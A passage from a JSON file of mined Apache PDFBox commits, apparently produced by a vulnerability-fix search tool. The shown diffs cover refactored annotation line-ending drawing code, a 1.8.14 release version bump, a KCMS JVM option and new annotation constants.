cs.drawShape(width, hasStroke, hasBackground);", - "+ }", - "+ else if (!PDAnnotationLine.LE_NONE.equals(style))", - "+ {", - "+ // need to do this separately, because sometimes /IC is set anyway", - "+ cs.drawShape(width, hasStroke, false);", - "+ }", - "+ }", - "+", - "+ /**", - "+ * Add the two arms of a horizontal arrow.", - "+ * ", - "+ * @param cs Content stream", - "+ * @param x", - "+ * @param y", - "+ * @param len The arm length. Positive goes to the right, negative goes to the left.", - "+ * ", - "+ * @throws IOException If the content stream could not be written", - "+ */", - "+ void drawArrow(PDAppearanceContentStream cs, float x, float y, float len) throws IOException", - "+ {", - "+ // strategy for arrows: angle 30\u00c2\u00b0, arrow arm length = 9 * line width", - "+ // cos(angle) = x position", - "+ // sin(angle) = y position", - "+ // this comes very close to what Adobe is doing", - "+ cs.moveTo(x + (float) (Math.cos(ARROW_ANGLE) * len), y + (float) (Math.sin(ARROW_ANGLE) * len));", - "+ cs.lineTo(x, y);", - "+ cs.lineTo(x + (float) (Math.cos(ARROW_ANGLE) * len), y - (float) (Math.sin(ARROW_ANGLE) * len));", - "+ }", - "+", - "+ /**", - "+ * Add a square diamond shape (corner on top) to the path.", - "+ *", - "+ * @param cs Content stream", - "+ * @param x", - "+ * @param y", - "+ * @param r Radius (to a corner)", - "+ * ", - "+ * @throws IOException If the content stream could not be written", - "+ */", - "+ void drawDiamond(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", - "+ {", - "+ cs.moveTo(x - r, y);", - "+ cs.lineTo(x, y + r);", - "+ cs.lineTo(x + r, y);", - "+ cs.lineTo(x, y - r);", - "+ cs.closePath();", - "+ }", - "+", - "+ /**", - "+ * Add a circle shape to the path.", - "+ *", - "+ * @param cs Content stream", - "+ * @param x", - "+ * @param y", - "+ * @param r Radius", - "+ * ", - "+ * @throws IOException If the content stream could not be written", - "+ */", - "+ void addCircle(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", - "+ {", - "+ // http://stackoverflow.com/a/2007782/535646", - "+ float magic = r * 0.551784f;", - "+ cs.moveTo(x, y + r);", - "+ cs.curveTo(x + magic, y + r, x + r, y + magic, x + r, y);", - "+ cs.curveTo(x + r, y - magic, x + magic, y - r, x, y - r);", - "+ cs.curveTo(x - magic, y - r, x - r, y - magic, x - r, y);", - "+ cs.curveTo(x - r, y + magic, x - magic, y + r, x, y + r);", - "+ cs.closePath();", - "+ }", - "+", - " /**", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "index 36bf7552c..ac6ef2215 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "@@ -36,3 +36,2 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - "- static final double ARROW_ANGLE = Math.toRadians(30);", - " static final int FONT_SIZE = 9;", - "@@ -253,6 +252,5 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - "- // do this here and not before showing the text, or the text would appear in the", - "- // interior color", - "+ // paint the styles here and not before showing the text, or the text would appear", - "+ // with the interior color", - " boolean hasBackground = cs.setNonStrokingColorOnDemand(annotation.getInteriorColor());", - "- ", - " drawStyle(annotation.getStartPointEndingStyle(), cs, 0, y, ab.width, hasStroke, hasBackground);", - "@@ -267,137 +265,2 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - "- private void drawStyle(String style, final PDAppearanceContentStream cs, float x, float y,", - "- float width, boolean hasStroke, boolean hasBackground) throws IOException", - "- {", - "- switch (style)", - "- {", - "- case PDAnnotationLine.LE_OPEN_ARROW:", - "- case PDAnnotationLine.LE_CLOSED_ARROW:", - "- if (Float.compare(x, 0) != 0)", - "- {", - "- // ending", - "- drawArrow(cs, x - width, y, -width * 9);", - "- }", - "- else", - "- {", - "- // start", - "- drawArrow(cs, width, y, width * 9);", - "- }", - "- if (PDAnnotationLine.LE_CLOSED_ARROW.equals(style))", - "- {", - "- cs.closePath();", - "- }", - "- break;", - "- case PDAnnotationLine.LE_BUTT:", - "- cs.moveTo(x, y - width * 3);", - "- cs.lineTo(x, y + width * 3);", - "- break;", - "- case PDAnnotationLine.LE_DIAMOND:", - "- drawDiamond(cs, x, y, width * 3);", - "- break;", - "- case PDAnnotationLine.LE_SQUARE:", - "- cs.addRect(x - width * 3, y - width * 3, width * 6, width * 6);", - "- break;", - "- case PDAnnotationLine.LE_CIRCLE:", - "- addCircle(cs, x, y, width * 3);", - "- break;", - "- case PDAnnotationLine.LE_R_OPEN_ARROW:", - "- case PDAnnotationLine.LE_R_CLOSED_ARROW:", - "- if (Float.compare(x, 0) != 0)", - "- {", - "- // ending", - "- drawArrow(cs, x + width, y, width * 9);", - "- }", - "- else", - "- {", - "- // start", - "- drawArrow(cs, -width, y, -width * 9);", - "- }", - "- if (PDAnnotationLine.LE_R_CLOSED_ARROW.equals(style))", - "- {", - "- cs.closePath();", - "- }", - "- break;", - "- case PDAnnotationLine.LE_SLASH:", - "- // the line is 18 x linewidth at an angle of 60\u00c2\u00b0", - "- cs.moveTo(x + (float) (Math.cos(Math.toRadians(60)) * width * 9),", - "- y + (float) (Math.sin(Math.toRadians(60)) * width * 9));", - "- cs.lineTo(x + (float) (Math.cos(Math.toRadians(240)) * width * 9),", - "- y + (float) (Math.sin(Math.toRadians(240)) * width * 9));", - "- break;", - "- default:", - "- break;", - "- }", - "- if (INTERIOR_COLOR_STYLES.contains(style))", - "- {", - "- cs.drawShape(width, hasStroke, hasBackground);", - "- }", - "- else if (!PDAnnotationLine.LE_NONE.equals(style))", - "- {", - "- // need to do this separately, because sometimes /IC is set anyway", - "- cs.drawShape(width, hasStroke, false);", - "- }", - "- }", - "-", - "- /**", - "- * Add the two arms of a horizontal arrow.", - "- * ", - "- * @param cs Content stream", - "- * @param x", - "- * @param y", - "- * @param len The arm length. Positive goes to the right, negative goes to the left.", - "- * ", - "- * @throws IOException If the content stream could not be written", - "- */", - "- private void drawArrow(PDAppearanceContentStream cs, float x, float y, float len) throws IOException", - "- {", - "- // strategy for arrows: angle 30\u00c2\u00b0, arrow arm length = 9 * line width", - "- // cos(angle) = x position", - "- // sin(angle) = y position", - "- // this comes very close to what Adobe is doing", - "- cs.moveTo(x + (float) (Math.cos(ARROW_ANGLE) * len), y + (float) (Math.sin(ARROW_ANGLE) * len));", - "- cs.lineTo(x, y);", - "- cs.lineTo(x + (float) (Math.cos(ARROW_ANGLE) * len), y - (float) (Math.sin(ARROW_ANGLE) * len));", - "- }", - "-", - "- /**", - "- * Add a square diamond shape (corner on top) to the path.", - "- *", - "- * @param cs Content stream", - "- * @param x", - "- * @param y", - "- * @param r Radius (to a corner)", - "- * ", - "- * @throws IOException If the content stream could not be written", - "- */", - "- private void drawDiamond(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", - "- {", - "- cs.moveTo(x - r, y);", - "- cs.lineTo(x, y + r);", - "- cs.lineTo(x + r, y);", - "- cs.lineTo(x, y - r);", - "- cs.closePath();", - "- }", - "-", - "- /**", - "- * Add a circle shape to the path.", - "- *", - "- * @param cs Content stream", - "- * @param x", - "- * @param y", - "- * @param r Radius", - "- * ", - "- * @throws IOException If the content stream could not be written", - "- */", - "- private void addCircle(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", - "- {", - "- // http://stackoverflow.com/a/2007782/535646", - "- float magic = r * 0.551784f;", - "- cs.moveTo(x, y + r);", - "- cs.curveTo(x + magic, y + r, x + r, y + magic, x + r, y);", - "- cs.curveTo(x + r, y - magic, x + magic, y - r, x, y - r);", - "- cs.curveTo(x - magic, y - r, x - r, y - magic, x - r, y);", - "- cs.curveTo(x - r, y + magic, x - magic, y + r, x, y + r);", - "- cs.closePath();", - "- }", - "-", - " @Override", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "index 74f4bfc06..ebfa3b402 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "@@ -30,7 +30,4 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationPolyline;", - " import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationLine;", - " import static org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationLine.LE_NONE;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderStyleDictionary;", - "-import static org.apache.pdfbox.pdmodel.interactive.annotation.handlers.PDAbstractAppearanceHandler.INTERIOR_COLOR_STYLES;", - "-import static org.apache.pdfbox.pdmodel.interactive.annotation.handlers.PDLineAppearanceHandler.ARROW_ANGLE;", - " import org.apache.pdfbox.util.Matrix;", - "@@ -159,3 +156,3 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", - "- // this must be done after polyline draw, to avoid line crossing a filled shape", - "+ // paint the styles here and after polyline draw, to avoid line crossing a filled shape", - " if (!LE_NONE.equals(annotation.getStartPointEndingStyle()))", - "@@ -249,140 +246,2 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", - " }", - "-", - "- //TODO refactor to remove double code drawStyle and related", - "- // (100% copied from line handler)", - "-", - "- private void drawStyle(String style, final PDAppearanceContentStream cs, float x, float y,", - "- float width, boolean hasStroke, boolean hasBackground) throws IOException", - "- {", - "- switch (style)", - "- {", - "- case PDAnnotationLine.LE_OPEN_ARROW:", - "- case PDAnnotationLine.LE_CLOSED_ARROW:", - "- if (Float.compare(x, 0) != 0)", - "- {", - "- // ending", - "- drawArrow(cs, x - width, y, -width * 9);", - "- }", - "- else", - "- {", - "- // start", - "- drawArrow(cs, width, y, width * 9);", - "- }", - "- if (PDAnnotationLine.LE_CLOSED_ARROW.equals(style))", - "- {", - "- cs.closePath();", - "- }", - "- break;", - "- case PDAnnotationLine.LE_BUTT:", - "- cs.moveTo(x, y - width * 3);", - "- cs.lineTo(x, y + width * 3);", - "- break;", - "- case PDAnnotationLine.LE_DIAMOND:", - "- drawDiamond(cs, x, y, width * 3);", - "- break;", - "- case PDAnnotationLine.LE_SQUARE:", - "- cs.addRect(x - width * 3, y - width * 3, width * 6, width * 6);", - "- break;", - "- case PDAnnotationLine.LE_CIRCLE:", - "- addCircle(cs, x, y, width * 3);", - "- break;", - "- case PDAnnotationLine.LE_R_OPEN_ARROW:", - "- case PDAnnotationLine.LE_R_CLOSED_ARROW:", - "- if (Float.compare(x, 0) != 0)", - "- {", - "- // ending", - "- drawArrow(cs, x + width, y, width * 9);", - "- }", - "- else", - "- {", - "- // start", - "- drawArrow(cs, -width, y, -width * 9);", - "- }", - "- if (PDAnnotationLine.LE_R_CLOSED_ARROW.equals(style))", - "- {", - "- cs.closePath();", - "- }", - "- break;", - "- case PDAnnotationLine.LE_SLASH:", - "- // the line is 18 x linewidth at an angle of 60\u00c2\u00b0", - "- cs.moveTo(x + (float) (Math.cos(Math.toRadians(60)) * width * 9),", - "- y + (float) (Math.sin(Math.toRadians(60)) * width * 9));", - "- cs.lineTo(x + (float) (Math.cos(Math.toRadians(240)) * width * 9),", - "- y + (float) (Math.sin(Math.toRadians(240)) * width * 9));", - "- break;", - "- default:", - "- break;", - "- }", - "- if (INTERIOR_COLOR_STYLES.contains(style))", - "- {", - "- cs.drawShape(width, hasStroke, hasBackground);", - "- }", - "- else if (!PDAnnotationLine.LE_NONE.equals(style))", - "- {", - "- // need to do this separately, because sometimes /IC is set anyway", - "- cs.drawShape(width, hasStroke, false);", - "- }", - "- }", - "-", - "- /**", - "- * Add the two arms of a horizontal arrow.", - "- * ", - "- * @param cs Content stream", - "- * @param x", - "- * @param y", - "- * @param len The arm length. Positive goes to the right, negative goes to the left.", - "- * ", - "- * @throws IOException If the content stream could not be written", - "- */", - "- private void drawArrow(PDAppearanceContentStream cs, float x, float y, float len) throws IOException", - "- {", - "- // strategy for arrows: angle 30\u00c2\u00b0, arrow arm length = 9 * line width", - "- // cos(angle) = x position", - "- // sin(angle) = y position", - "- // this comes very close to what Adobe is doing", - "- cs.moveTo(x + (float) (Math.cos(ARROW_ANGLE) * len), y + (float) (Math.sin(ARROW_ANGLE) * len));", - "- cs.lineTo(x, y);", - "- cs.lineTo(x + (float) (Math.cos(ARROW_ANGLE) * len), y - (float) (Math.sin(ARROW_ANGLE) * len));", - "- }", - "-", - "- /**", - "- * Add a square diamond shape (corner on top) to the path.", - "- *", - "- * @param cs Content stream", - "- * @param x", - "- * @param y", - "- * @param r Radius (to a corner)", - "- * ", - "- * @throws IOException If the content stream could not be written", - "- */", - "- private void drawDiamond(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", - "- {", - "- cs.moveTo(x - r, y);", - "- cs.lineTo(x, y + r);", - "- cs.lineTo(x + r, y);", - "- cs.lineTo(x, y - r);", - "- cs.closePath();", - "- }", - "-", - "- /**", - "- * Add a circle shape to the path.", - "- *", - "- * @param cs Content stream", - "- * @param x", - "- * @param y", - "- * @param r Radius", - "- * ", - "- * @throws IOException If the content stream could not be written", - "- */", - "- private void addCircle(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", - "- {", - "- // http://stackoverflow.com/a/2007782/535646", - "- float magic = r * 0.551784f;", - "- cs.moveTo(x, y + r);", - "- cs.curveTo(x + magic, y + r, x + r, y + magic, x + r, y);", - "- cs.curveTo(x + r, y - magic, x + magic, y - r, x, y - r);", - "- cs.curveTo(x - magic, y - r, x - r, y - magic, x - r, y);", - "- cs.curveTo(x - r, y + magic, x - magic, y + r, x, y + r);", - "- cs.closePath();", - "- }", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "656ad4104ce39521d4040b08826b9bf729a91c57", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523900987, - "hunks": 17, - "message": "[maven-release-plugin] prepare release 1.8.14 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/1.8@1829305 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/ant/pom.xml b/ant/pom.xml", - "index 8ac09774b..a748e9097 100644", - "--- a/ant/pom.xml", - "+++ b/ant/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 1.8.14-SNAPSHOT", - "+ 1.8.14", - " ../parent/pom.xml", - "diff --git a/app/pom.xml b/app/pom.xml", - "index a77629018..d92ee8482 100644", - "--- a/app/pom.xml", - "+++ b/app/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 1.8.14-SNAPSHOT", - "+ 1.8.14", - " ../parent/pom.xml", - "diff --git a/examples/pom.xml b/examples/pom.xml", - "index 3bfb8beff..6934a644d 100644", - "--- a/examples/pom.xml", - "+++ b/examples/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 1.8.14-SNAPSHOT", - "+ 1.8.14", - " ../parent/pom.xml", - "diff --git a/fontbox/pom.xml b/fontbox/pom.xml", - "index 2713b99dc..ac21d2020 100644", - "--- a/fontbox/pom.xml", - "+++ b/fontbox/pom.xml", - "@@ -23,3 +23,3 @@", - " pdfbox-parent", - "- 1.8.14-SNAPSHOT", - "+ 1.8.14", - " ../parent/pom.xml", - "diff --git a/jempbox/pom.xml b/jempbox/pom.xml", - "index ad65c38fd..2d8ea5c43 100644", - "--- a/jempbox/pom.xml", - "+++ b/jempbox/pom.xml", - "@@ -23,3 +23,3 @@", - " pdfbox-parent", - "- 1.8.14-SNAPSHOT", - "+ 1.8.14", - " ../parent/pom.xml", - "diff --git a/lucene/pom.xml b/lucene/pom.xml", - "index 22f3efc4e..4ed039065 100644", - "--- a/lucene/pom.xml", - "+++ b/lucene/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 1.8.14-SNAPSHOT", - "+ 1.8.14", - " ../parent/pom.xml", - "diff --git a/parent/pom.xml b/parent/pom.xml", - "index f50b5fb99..677b6a4b0 100644", - "--- a/parent/pom.xml", - "+++ b/parent/pom.xml", - "@@ -31,3 +31,3 @@", - " pdfbox-parent", - "- 1.8.14-SNAPSHOT", - "+ 1.8.14", - " pom", - "@@ -321,5 +321,5 @@", - " ", - "- scm:svn:http://svn.apache.org/repos/asf/maven/pom/branches/1.8/pdfbox-parent", - "- scm:svn:https://svn.apache.org/repos/asf/maven/pom/branches/1.8/pdfbox-parent", - "- http://svn.apache.org/viewvc/maven/pom/branches/1.8/pdfbox-parent", - "+ scm:svn:http://svn.apache.org/repos/asf/maven/pom/tags/1.8.14/pdfbox-parent", - "+ scm:svn:https://svn.apache.org/repos/asf/maven/pom/tags/1.8.14/pdfbox-parent", - "+ http://svn.apache.org/viewvc/maven/pom/tags/1.8.14/pdfbox-parent", - " ", - "diff --git a/pdfbox/pom.xml b/pdfbox/pom.xml", - "index 7c050baff..03c86c52b 100644", - "--- a/pdfbox/pom.xml", - "+++ b/pdfbox/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 1.8.14-SNAPSHOT", - "+ 1.8.14", - " ../parent/pom.xml", - "diff --git a/pom.xml b/pom.xml", - "index 71f4fcc77..bcd3617a6 100644", - "--- a/pom.xml", - "+++ b/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 1.8.14-SNAPSHOT", - "+ 1.8.14", - " parent/pom.xml", - "@@ -36,8 +36,8 @@", - " ", - "- scm:svn:http://svn.apache.org/repos/asf/pdfbox/branches/1.8", - "+ scm:svn:http://svn.apache.org/repos/asf/pdfbox/tags/1.8.14", - " ", - " ", - "- scm:svn:https://svn.apache.org/repos/asf/pdfbox/branches/1.8", - "+ scm:svn:https://svn.apache.org/repos/asf/pdfbox/tags/1.8.14", - " ", - "- http://svn.apache.org/viewvc/pdfbox/branches/1.8", - "+ http://svn.apache.org/viewvc/pdfbox/tags/1.8.14", - " ", - "diff --git a/preflight-app/pom.xml b/preflight-app/pom.xml", - "index 48ba66e1b..49464a5ae 100644", - "--- a/preflight-app/pom.xml", - "+++ b/preflight-app/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 1.8.14-SNAPSHOT", - "+ 1.8.14", - " ../parent/pom.xml", - "diff --git a/preflight/pom.xml b/preflight/pom.xml", - "index 7731012a7..15e8ec381 100644", - "--- a/preflight/pom.xml", - "+++ b/preflight/pom.xml", - "@@ -28,3 +28,3 @@", - " \t\tpdfbox-parent", - "-\t\t1.8.14-SNAPSHOT", - "+\t\t1.8.14", - " \t\t../parent/pom.xml", - "diff --git a/war/pom.xml b/war/pom.xml", - "index 0bf5f0e7b..bedaa496e 100644", - "--- a/war/pom.xml", - "+++ b/war/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 1.8.14-SNAPSHOT", - "+ 1.8.14", - " ../parent/pom.xml", - "diff --git a/xmpbox/pom.xml b/xmpbox/pom.xml", - "index 039db8267..59af6eb8d 100644", - "--- a/xmpbox/pom.xml", - "+++ b/xmpbox/pom.xml", - "@@ -29,3 +29,3 @@", - " \t\tpdfbox-parent", - "-\t\t1.8.14-SNAPSHOT", - "+\t\t1.8.14", - " \t\t../parent/pom.xml" - ], - "changed_files": [ - "ant/pom.xml", - "app/pom.xml", - "examples/pom.xml", - "fontbox/pom.xml", - "jempbox/pom.xml", - "lucene/pom.xml", - "parent/pom.xml", - "pdfbox/pom.xml", - "pom.xml", - "preflight-app/pom.xml", - "preflight/pom.xml", - "war/pom.xml", - "xmpbox/pom.xml" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "d24d2fa3234b678eec36c45bb0bb8d38b46dedc6" - ] - ], - "tags": [ - "1.8.14", - "1.8.15", - "1.8.16", - "1.8.17" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - } - ] - }, - { - "commit_id": "97568988e2514f1c5aced9c93cef82c0a408cdf6", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1526743307, - "hunks": 5, - "message": "PDFBOX-3353: move styles sets up to abstract class because it will also be used by polyline handler git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831900 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "index 94556f985..72626ee53 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "@@ -21,2 +21,5 @@ import java.awt.geom.AffineTransform;", - " import java.io.IOException;", - "+import java.util.Collections;", - "+import java.util.HashSet;", - "+import java.util.Set;", - "@@ -30,2 +33,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationSquareCircle", - " import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationLine;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceDictionary;", - "@@ -44,3 +48,35 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", - " private final PDAnnotation annotation;", - "- ", - "+", - "+ /**", - "+ * Line ending styles where the line has to be drawn shorter (minus line width).", - "+ */", - "+ protected static final Set SHORT_STYLES = createShortStyles();", - "+", - "+ /**", - "+ * Line ending styles where there is an interior color.", - "+ */", - "+ protected static final Set INTERIOR_COLOR_STYLES = createInteriorColorStyles();", - "+", - "+ private static Set createShortStyles()", - "+ {", - "+ Set shortStyles = new HashSet<>();", - "+ shortStyles.add(PDAnnotationLine.LE_OPEN_ARROW);", - "+ shortStyles.add(PDAnnotationLine.LE_CLOSED_ARROW);", - "+ shortStyles.add(PDAnnotationLine.LE_SQUARE);", - "+ shortStyles.add(PDAnnotationLine.LE_CIRCLE);", - "+ shortStyles.add(PDAnnotationLine.LE_DIAMOND);", - "+ return Collections.unmodifiableSet(shortStyles);", - "+ }", - "+", - "+ private static Set createInteriorColorStyles()", - "+ {", - "+ Set interiorColorStyles = new HashSet<>();", - "+ interiorColorStyles.add(PDAnnotationLine.LE_CLOSED_ARROW);", - "+ interiorColorStyles.add(PDAnnotationLine.LE_CIRCLE);", - "+ interiorColorStyles.add(PDAnnotationLine.LE_DIAMOND);", - "+ interiorColorStyles.add(PDAnnotationLine.LE_R_CLOSED_ARROW);", - "+ interiorColorStyles.add(PDAnnotationLine.LE_SQUARE);", - "+ return Collections.unmodifiableSet(interiorColorStyles);", - "+ }", - "+", - " public PDAbstractAppearanceHandler(PDAnnotation annotation)", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "index 51aaca1b4..340de6643 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "@@ -19,4 +19,2 @@ package org.apache.pdfbox.pdmodel.interactive.annotation.handlers;", - " import java.io.IOException;", - "-import java.util.HashSet;", - "-import java.util.Set;", - " import org.apache.commons.logging.Log;", - "@@ -41,27 +39,2 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - "- /**", - "- * styles where the line has to be drawn shorter (minus line width).", - "- */", - "- private static final Set SHORT_STYLES = new HashSet<>();", - "-", - "- /**", - "- * styles where there is an interior color.", - "- */", - "- private static final Set INTERIOR_COLOR_STYLES = new HashSet<>();", - "-", - "- static", - "- {", - "- SHORT_STYLES.add(PDAnnotationLine.LE_OPEN_ARROW);", - "- SHORT_STYLES.add(PDAnnotationLine.LE_CLOSED_ARROW);", - "- SHORT_STYLES.add(PDAnnotationLine.LE_SQUARE);", - "- SHORT_STYLES.add(PDAnnotationLine.LE_CIRCLE);", - "- SHORT_STYLES.add(PDAnnotationLine.LE_DIAMOND);", - "-", - "- INTERIOR_COLOR_STYLES.add(PDAnnotationLine.LE_CLOSED_ARROW);", - "- INTERIOR_COLOR_STYLES.add(PDAnnotationLine.LE_CIRCLE);", - "- INTERIOR_COLOR_STYLES.add(PDAnnotationLine.LE_DIAMOND);", - "- INTERIOR_COLOR_STYLES.add(PDAnnotationLine.LE_R_CLOSED_ARROW);", - "- INTERIOR_COLOR_STYLES.add(PDAnnotationLine.LE_SQUARE);", - "- }", - "-", - " public PDLineAppearanceHandler(PDAnnotation annotation)" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "c745b2217ecc5d60c625321db56a4e49173f78e8", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523478190, - "hunks": 1, - "message": "PDFBOX-4071: add option to use KCMS git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/1.8@1828933 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/pom.xml b/pdfbox/pom.xml", - "index 2e5cadccd..7c050baff 100644", - "--- a/pdfbox/pom.xml", - "+++ b/pdfbox/pom.xml", - "@@ -136,3 +136,3 @@", - " ", - "- -Xmx128m", - "+ -Xmx128m -Dsun.java2d.cmm=sun.java2d.cmm.kcms.KcmsServiceProvider", - " " - ], - "changed_files": [ - "pdfbox/pom.xml" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "1.8.14", - "1.8.15", - "1.8.16", - "1.8.17" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "d7f5d548ac1d0bcb6443d5642036f7bee719684d", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1529687862, - "hunks": 1, - "message": "PDFBOX-3353: add constants git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834147 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", - "index 913c49a0e..4dcf1b9e8 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", - "@@ -99,3 +99,18 @@ public class PDAnnotationText extends PDAnnotationMarkup", - " */", - "- public static final String NAME_RIGHT_POINTER = \"RightPointer\"; ", - "+ public static final String NAME_RIGHT_POINTER = \"RightPointer\";", - "+", - "+ /**", - "+ * Constant for the name of a crosshairs annotation.", - "+ */", - "+ public static final String NAME_UP_ARROW = \"UpArrow\"; ", - "+", - "+ /**", - "+ * Constant for the name of a crosshairs annotation.", - "+ */", - "+ public static final String NAME_UP_LEFT_ARROW = \"UpLeftArrow\"; ", - "+", - "+ /**", - "+ * Constant for the name of a crosshairs annotation.", - "+ */", - "+ public static final String NAME_CROSS_HAIRS = \"CrossHairs\"; " - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - 